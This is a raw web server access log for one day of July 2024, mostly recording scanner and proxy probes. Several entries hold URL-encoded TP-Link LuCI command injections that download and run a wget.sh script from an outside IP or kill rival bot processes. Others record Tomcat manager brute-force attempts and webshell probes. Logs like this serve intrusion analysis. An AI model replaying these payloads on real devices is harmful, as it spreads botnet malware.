80.76.49.105 - - [15/Jul/2024:00:02:26 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 87.121.69.27 - - [15/Jul/2024:00:20:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.92 - - [15/Jul/2024:00:25:28 +0200] "-" 400 1930 198.235.24.92 - - [15/Jul/2024:00:25:29 +0200] "-" 400 1930 141.98.11.15 - - [15/Jul/2024:00:42:34 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.105 - - [15/Jul/2024:00:45:20 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.105 - - [15/Jul/2024:00:45:23 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.105 - - [15/Jul/2024:00:45:23 +0200] "GET /favicon.ico HTTP/1.1" 404 729 23.95.200.178 - - [15/Jul/2024:00:50:12 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.152 - - [15/Jul/2024:01:32:08 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [15/Jul/2024:01:32:08 +0200] "-" 400 1930 45.128.232.152 - - [15/Jul/2024:01:32:08 +0200] "-" 400 1930 45.128.232.152 - - [15/Jul/2024:01:32:08 +0200] "-" 400 1930 43.224.10.148 - - [15/Jul/2024:01:32:26 +0200] "GET / HTTP/1.1" 200 1895 46.101.122.229 - - [15/Jul/2024:01:44:39 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [15/Jul/2024:02:01:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 165.154.182.221 - - [15/Jul/2024:02:49:38 +0200] "-" 400 1930 45.148.10.202 - - [15/Jul/2024:02:49:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [15/Jul/2024:02:49:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 165.154.182.221 - - [15/Jul/2024:02:49:49 +0200] "GET / HTTP/1.1" 200 1895 165.154.182.221 - - [15/Jul/2024:02:50:07 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.182.221 - - [15/Jul/2024:02:50:07 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.182.221 - - [15/Jul/2024:02:50:08 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 165.154.182.221 - - [15/Jul/2024:02:50:08 +0200] "GET /config.json HTTP/1.1" 404 729 87.121.69.27 - - [15/Jul/2024:03:23:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 172.104.175.166 - - [15/Jul/2024:03:30:00 +0200] "GET / HTTP/1.1" 200 1895 172.104.175.166 - - [15/Jul/2024:03:30:00 +0200] "GET /..;/..;/ HTTP/1.1" 400 804 172.104.175.166 - - [15/Jul/2024:03:30:01 +0200] "GET /manager/html HTTP/1.1" 401 2499 172.104.175.166 - - [15/Jul/2024:03:30:01 +0200] "POST /manager/html HTTP/1.1" 401 2499 172.104.175.166 - - [15/Jul/2024:03:30:02 +0200] "POST /manager/html HTTP/1.1" 401 2499 172.104.175.166 - - [15/Jul/2024:03:30:02 +0200] "POST /manager/html HTTP/1.1" 401 2499 172.104.175.166 - - [15/Jul/2024:03:30:03 +0200] "POST /manager/html HTTP/1.1" 401 2499 172.104.175.166 - - [15/Jul/2024:03:30:03 +0200] "POST /manager/html HTTP/1.1" 401 2499 172.104.175.166 - - [15/Jul/2024:03:30:04 +0200] "POST /manager/html HTTP/1.1" 401 2499 172.104.175.166 - - [15/Jul/2024:03:30:05 +0200] "POST /manager/html HTTP/1.1" 401 2499 172.104.175.166 - - [15/Jul/2024:03:30:05 +0200] "POST /manager/html HTTP/1.1" 401 2499 172.104.175.166 - - [15/Jul/2024:03:30:06 +0200] "POST /manager/html HTTP/1.1" 401 2499 172.104.175.166 - - [15/Jul/2024:03:30:06 +0200] "POST /manager/html HTTP/1.1" 401 2499 174.138.2.203 - - [15/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:03:41:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:03:41:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 44.195.32.105 - - [15/Jul/2024:03:48:26 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [15/Jul/2024:03:50:01 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:03:50:01 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:03:50:01 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:03:50:01 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:03:50:01 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:03:50:01 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:03:50:01 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:03:50:02 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 194.59.31.99 - - [15/Jul/2024:03:54:58 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 172.169.4.185 - - [15/Jul/2024:04:15:34 +0200] "GET / HTTP/1.1" 200 1895 185.191.126.213 - - [15/Jul/2024:04:37:51 +0200] "GET / HTTP/1.1" 200 1895 44.195.32.105 - - [15/Jul/2024:04:46:47 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 184.105.247.252 - - [15/Jul/2024:05:12:25 +0200] "GET / HTTP/1.1" 200 1895 184.105.247.238 - - [15/Jul/2024:05:13:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729 94.156.10.163 - - [15/Jul/2024:05:13:35 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 184.105.247.247 - - [15/Jul/2024:05:13:38 +0200] "GET /?format=json HTTP/1.1" 200 1895 184.105.247.252 - - [15/Jul/2024:05:14:04 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 106.75.137.241 - - [15/Jul/2024:05:31:22 +0200] "GET /.git/config HTTP/1.1" 404 733 194.59.31.99 - - [15/Jul/2024:06:00:02 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 45.58.184.187 - - [15/Jul/2024:06:00:07 +0200] "-" 400 1930 45.58.184.187 - - [15/Jul/2024:06:00:08 +0200] "-" 400 1930 45.58.184.187 - - [15/Jul/2024:06:00:08 +0200] "GET / HTTP/1.1" 200 1895 45.58.184.187 - - [15/Jul/2024:06:00:08 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 94.156.10.163 - - [15/Jul/2024:06:00:19 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 206.168.32.111 - - [15/Jul/2024:06:29:01 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.111 - - [15/Jul/2024:06:29:04 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.111 - - [15/Jul/2024:06:29:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.89.245.57 - - [15/Jul/2024:06:40:38 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.220 - - [15/Jul/2024:06:44:08 +0200] "-" 400 1930 94.156.10.163 - - [15/Jul/2024:06:50:47 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 80.82.77.202 - - [15/Jul/2024:07:05:59 +0200] "-" 400 1930 80.82.70.133 - - [15/Jul/2024:07:06:46 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [15/Jul/2024:07:13:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [15/Jul/2024:08:01:53 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.67.70 - - [15/Jul/2024:08:11:50 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 80.66.76.130 - - [15/Jul/2024:08:13:23 +0200] "-" 400 1930 141.98.11.15 - - [15/Jul/2024:08:25:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.75.212.75 - - [15/Jul/2024:08:58:21 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 80.75.212.75 - - [15/Jul/2024:08:58:21 +0200] "-" 400 1930 80.75.212.75 - - [15/Jul/2024:08:58:21 +0200] "-" 400 1930 112.74.38.239 - - [15/Jul/2024:09:04:01 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.202 - - [15/Jul/2024:09:23:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [15/Jul/2024:09:23:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 174.138.2.203 - - [15/Jul/2024:09:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:09:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:09:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:09:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:09:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:09:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:09:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:09:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:09:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 118.200.133.199 - - [15/Jul/2024:10:03:22 +0200] "GET / HTTP/1.0" 200 1895 92.255.85.107 - - [15/Jul/2024:12:13:34 +0200] "-" 400 1930 45.95.169.184 - - [15/Jul/2024:12:32:14 +0200] "-" 400 1930 45.95.169.184 - - [15/Jul/2024:12:32:14 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 14.116.254.172 - - [15/Jul/2024:12:52:22 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 84.54.51.37 - - [15/Jul/2024:13:59:52 +0200] "GET null HTTP/1.1" 400 1994 206.168.32.103 - - [15/Jul/2024:14:54:22 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [15/Jul/2024:14:54:25 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [15/Jul/2024:14:54:26 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.148.10.202 - - [15/Jul/2024:15:02:30 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [15/Jul/2024:15:02:30 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 51.154.5.221 - - [15/Jul/2024:15:26:40 +0200] "GET / HTTP/1.0" 200 1895 174.138.2.203 - - [15/Jul/2024:15:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:15:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:15:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:15:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:15:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:15:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:15:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:15:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 94.156.10.163 - - [15/Jul/2024:15:48:23 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 174.138.2.203 - - [15/Jul/2024:15:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:15:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:15:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:15:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:15:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:15:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:15:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:15:49:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 94.156.71.239 - - [15/Jul/2024:16:08:27 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 141.98.11.15 - - [15/Jul/2024:16:28:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.10.163 - - [15/Jul/2024:16:40:34 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 94.156.66.83 - - [15/Jul/2024:17:02:35 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 118.193.59.237 - - [15/Jul/2024:17:02:58 +0200] "-" 400 1930 118.193.59.237 - - [15/Jul/2024:17:03:08 +0200] "GET / HTTP/1.1" 200 1895 118.193.59.237 - - [15/Jul/2024:17:03:26 +0200] "GET /favicon.ico HTTP/1.1" 404 729 118.193.59.237 - - [15/Jul/2024:17:03:26 +0200] "GET /robots.txt HTTP/1.1" 404 728 118.193.59.237 - - [15/Jul/2024:17:03:26 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 118.193.59.237 - - [15/Jul/2024:17:03:26 +0200] "GET /config.json HTTP/1.1" 404 729 172.168.40.233 - - [15/Jul/2024:17:04:59 +0200] "GET /hudson HTTP/1.1" 404 724 115.231.78.5 - - [15/Jul/2024:18:10:29 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.5 - - [15/Jul/2024:18:10:29 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.5 - - [15/Jul/2024:18:10:30 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.89.245.57 - - [15/Jul/2024:19:15:50 +0200] "GET / HTTP/1.1" 200 1895 84.54.51.37 - - [15/Jul/2024:19:47:58 +0200] "GET null HTTP/1.1" 400 1994 41.42.23.0 - - [15/Jul/2024:19:51:46 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 94.156.10.163 - - [15/Jul/2024:20:22:44 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 104.168.70.165 - - [15/Jul/2024:20:24:43 +0200] "GET / HTTP/1.1" 200 1895 44.220.188.129 - - [15/Jul/2024:20:52:08 +0200] "GET / HTTP/1.1" 200 1895 78.108.177.52 - - [15/Jul/2024:20:56:18 +0200] "GET / HTTP/1.0" 200 1895 50.31.21.10 - - [15/Jul/2024:20:57:38 +0200] "GET / HTTP/1.0" 200 1895 50.31.21.10 - - [15/Jul/2024:20:59:38 +0200] "POST /sdk HTTP/1.1" 404 721 50.31.21.10 - - [15/Jul/2024:20:59:39 +0200] "GET / HTTP/1.0" 200 1895 50.31.21.10 - - [15/Jul/2024:20:59:39 +0200] "GET / HTTP/1.1" 200 1895 50.31.21.10 - - [15/Jul/2024:20:59:40 +0200] "HEAD / HTTP/1.1" 200 - 50.31.21.10 - - [15/Jul/2024:20:59:40 +0200] "GET /nmaplowercheck1721069976 HTTP/1.1" 404 742 50.31.21.10 - - [15/Jul/2024:20:59:41 +0200] "GET /evox/about HTTP/1.1" 404 732 50.31.21.10 - - [15/Jul/2024:20:59:41 +0200] "GET /HNAP1 HTTP/1.1" 404 723 64.62.197.147 - - [15/Jul/2024:21:05:00 +0200] "GET /gremlin HTTP/1.1" 404 725 174.138.2.203 - - [15/Jul/2024:21:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:21:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:21:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:21:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:21:41:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:21:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:21:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:21:41:25 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [15/Jul/2024:21:49:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:21:49:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:21:49:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:21:49:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:21:49:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:21:49:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:21:49:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [15/Jul/2024:21:49:56 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "GET / HTTP/1.1" 200 1895 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "GET /getBasicInformation HTTP/1.1" 404 737 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "GET /chklst.txt HTTP/1.1" 404 728 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "GET /common/info.cgi HTTP/1.1" 404 737 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "POST /DHMAPI/ HTTP/1.1" 404 729 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "GET /currentsetting.htm HTTP/1.1" 404 736 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "GET /api/system/deviceinfo HTTP/1.1" 404 747 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "GET /sysinfo.cgi HTTP/1.1" 404 729 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "POST /xml/HelpHeader.xml HTTP/1.1" 404 740 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "GET /islogin HTTP/1.1" 404 725 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "GET /dniapi/userInfos HTTP/1.1" 404 738 188.138.125.162 - - [15/Jul/2024:21:52:55 +0200] "GET /HNAP1/ HTTP/1.1" 404 728 45.79.115.117 - - [15/Jul/2024:22:07:38 +0200] "GET / HTTP/1.1" 200 1895 172.105.128.13 - - [15/Jul/2024:22:07:58 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [15/Jul/2024:22:38:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.202 - - [15/Jul/2024:22:52:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.202 - - [15/Jul/2024:22:52:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 756 205.210.31.99 - - [15/Jul/2024:23:34:59 +0200] "GET / HTTP/1.1" 200 1895 5.234.215.90 - - [15/Jul/2024:23:50:58 +0200] "GET / HTTP/1.1" 200 1895